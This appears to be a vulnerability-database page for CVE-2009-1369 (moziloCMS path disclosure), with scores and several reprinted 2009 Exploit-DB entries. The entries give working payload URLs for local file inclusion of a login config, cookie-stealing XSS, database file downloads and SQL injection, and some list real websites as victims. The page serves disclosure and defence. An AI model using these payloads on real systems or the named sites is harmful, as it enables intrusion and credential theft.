CVE-2009-1369
published 2009-04-22CVE-2009-1369: moziloCMS 1.11 allows remote attackers to obtain sensitive information via the (1) gal[] parameter to gallery.php, (2) page[] and (3) cat[] parameter to…
PriorityP415medium5CVSS 2.0
AVNACLAuNCPINAN
EXPLOIT
EPSS
2.45%
82.3th percentile
moziloCMS 1.11 allows remote attackers to obtain sensitive information via the (1) gal[] parameter to gallery.php, (2) page[] and (3) cat[] parameter to index.php, or (4) file[] parameter to download.php, which reveals the installation path in an error message.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| mozilo | mozilocms | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
moziloCMS 1.11 - Local File Inclusion / Full Path Disclosure / Cross-Site Scripting
exploitdb·2009-04-10
CVE-2009-4209 moziloCMS 1.11 - Local File Inclusion / Full Path Disclosure / Cross-Site Scripting
moziloCMS 1.11 - Local File Inclusion / Full Path Disclosure / Cross-Site Scripting
---
###############################################################################################
[+] moziloCMS 1.11 (LFI/PD/XSS) Multiple Remote Vulnerabilites
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
###############################################################################################
[+] Local File Inclusion
PoC 1 :
http://127.0.0.1/index.php?cat=10_Willkommen&page=../../../../../BOOTSECT.BAK%00
PoC 2 :
http://127.0.0.1/index.php?cat=10_Willkommen&page=../../admin/conf/logindata.conf%00
[+] Cross Site Scripting
PoC :
http://127.0.0.1/index.php?action=search&query=alert(document.cookie)
[+] Path Disclosure
PoC's :
http://127.0.0.1/gallery.php?gal[]=mozi
Exploit-DB
team 1.x - File Disclosure / Cross-Site Scripting
exploitdb·2009-02-04
CVE-2009-0761 team 1.x - File Disclosure / Cross-Site Scripting
team 1.x - File Disclosure / Cross-Site Scripting
---
#########################################################
Portal Name: Team Board
Version : all version
Google Dork : team5 studio all rights reserved site:cn
Author : Pouya_Server , [email protected]
Vulnerability : (DD/XSS)
#########################################################
[DD]:
http://site.com/[Path]/data/team.mdb
[XSS]:
http://site.com/[Path]/online.asp?lookname=>">alert(1369)%3B
Victem :
http://cinv.vhost021.cn/team
http://sxx.gov.cn/bbs
http://gdemc.gov.cn/bbs
http://bslogistics.cn/bbs
http://qzjd.gov.cn/teams
http://szlhlib.com.cn/cgbbs
http://sh9383.com.cn/digibook
http://www.gsjnrk.gov.cn/team
http://www.sxlcfda.gov.cn/yjlt
#########################################################
# milw0rm.com [2009-02-04]
Exploit-DB
Rankem - File Disclosure / Cross-Site Scripting / Cookie
exploitdb·2009-01-16
CVE-2009-0249 Rankem - File Disclosure / Cross-Site Scripting / Cookie
Rankem - File Disclosure / Cross-Site Scripting / Cookie
---
#########################################################
Portal Name: RankEm
Download : http://www.katywhitton.com/downloads/rankEm/rankEmDL.zip
Author : Pouya_Server , [email protected]
Vulnerability : (DD/XSS/CM)
#########################################################
[DD]:
http://site.com/[Path]/database/topsites.mdb
[XSS]:
http://site.com/rankup.asp?siteID=alert(1369)
[CM]:
http://site.com/rankup.asp?siteID=
Victem :
http://www.top50.co.nz
# milw0rm.com [2009-01-16]
Exploit-DB
Blog Manager - 'categoryId' Cross-Site Scripting
exploitdb·2009-01-16
CVE-2009-0338 Blog Manager - 'categoryId' Cross-Site Scripting
Blog Manager - 'categoryId' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/33314/info
DMXReady Blog Manager is prone to a cross-site scripting vulnerability and an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/inc_webblogmanager.asp?CategoryID=>">alert(1369)%3B&ItemID=1&action=refer
Exploit-DB
blogit! - SQL Injection / File Disclosure / Cross-Site Scripting
exploitdb·2009-01-16
CVE-2009-0337 blogit! - SQL Injection / File Disclosure / Cross-Site Scripting
blogit! - SQL Injection / File Disclosure / Cross-Site Scripting
---
#########################################################
Portal Name: BlogIt!
Download : http://www.katywhitton.com/downloads/BlogIt!/BlogItDL.zip
Author : Pouya_Server , [email protected]
Vulnerability : (SQL/DD/XSS)
#########################################################
[SQL]:
http://site.com/[Path]/index.asp?view=archive&day=[SQL]
[DD]:
http://site.com/[Path]/database/Blog.mdb
[XSS]:
http://site.com/[Path]/index.asp?view='+style='background:url(JaVaScRiPt:alert(1369))'+invalidparam='&day=1&month=12&year=2008
# milw0rm.com [2009-01-16]
Exploit-DB
Active Bids - 'search' Cross-Site Scripting
exploitdb·2009-01-15
CVE-2009-0430 Active Bids - 'search' Cross-Site Scripting
Active Bids - 'search' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/33306/info
Active Auction House and Active Auction Pro are prone to SQL-injection and cross-site scripting vulnerabilities because they fail to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[Path]/search.asp?search=&submit=%3E
http://www.example.com/[Path]/search.asp?search=>">alert(1369)%3B&submit=%3E
No writeups or analysis indexed.
2009-04-22
Published